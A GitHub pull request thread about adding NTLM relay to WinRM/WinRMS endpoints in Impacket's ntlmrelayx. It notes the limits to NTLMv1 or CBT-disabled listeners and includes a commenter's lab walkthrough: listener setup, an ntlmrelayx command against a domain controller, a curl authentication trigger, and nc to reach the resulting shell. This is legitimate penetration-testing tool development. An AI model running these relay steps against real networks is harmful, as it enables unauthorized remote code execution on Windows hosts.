Add new relay capabilities to the WinRM HTTPS endpoint

[Dfte]

This PR adds a new relay capability allowing us to relay SMB/LDAP/HTTP NTLM (v1 or unsecured ones) authentications to the WinRM HTTPS endpoint.

This endpoint is not configured on a default server installation but it is not protected by Channel Binding once configured by a sysadmin which makes it a possible great relay alternative for remote code executino.

Default action creates an interactive TCP shell that can be used via NC (socks is also implemented):

This PR was created by Joseph Mondloch (jmk@foofus) and me :)

[NeffIsBack]

That's some crazy stuff, good job @Dfte!

[Dfte]

Updates needed. I realized far too late that this technique was working on my environements because NTLMv1 was enabled. This technique won't work for NTLMv2 as is. Yet, I believe this can still be an interesting use case to add to Impacket as this module can still be used if:

• NTLMv1 is activated (natively or via downgrade attacks) ;
• MITM allows redirecting legitimate WinRM connections to our listener ;
• WinRM listener is configured to not support CBT (CBT=None).

Once again, sorry for the misinformation and feel free to add/deny this feature :)

[Dfte]

Have seen the error which made me realize I forgot to include latest WinRMrelayserver upgrades. And I fixed the spelling issues as well so hopefully I'll push all the updates in a couple of days :)

[Dfte]

At this point I have added:

• The WinRMRelayServer and WinRMSRelayServer which allows catching NTLM authentication over these two protocols ;
• The WinRMAttack which allows relaying to:
  • Anything if NTLMv1 is used ;
  • WinRMS endpoints if configured with CBT=None

:P

[dadevel]

For anybody who wants to play around with this PR:

Setup WinRMS.

New-SelfSignedCertificate -Subject 'CN=dc01.corp.local' -TextExtension '2.5.29.37={text}1.3.6.1.5.5.7.3.1'c
winrm create 'winrm/config/Listener?Address=*+Transport=HTTPS' '@{Hostname="dc01.corp.local"; CertificateThumbprint="9592A6D026E71AFFA17049D16D74AA7C47A89788"}'
New-NetFirewallRule -DisplayName 'WinRM HTTPS' -Direction 'Inbound' -LocalPort 5986 -Protocol 'TCP' -Action 'Allow' -Program 'System'

Start relay server.

ntlmrelayx.py -debug --no-smb-server --no-wcf-server --no-raw-server -t winrms://dc01.corp.local

Trigger authentication.

curl http://localhost -u 'corp\administrator:passw0rd' --ntlm

Get shell.

nc -v 127.0.0.1 11000

[Dfte]

Hey @anadrianmanrique any news on this one ? Considering it doesn't change any files or structures but simply adds new ones, can we merge that?

[anadrianmanrique]

@Dfte sorry for not answering, I've been OOO last week. I think this is a great feature besides limitations with NTLMv2. We are planning to integrate it in the context of 0.13 version, which is soon to be released. Glad to see that you reopened it #1987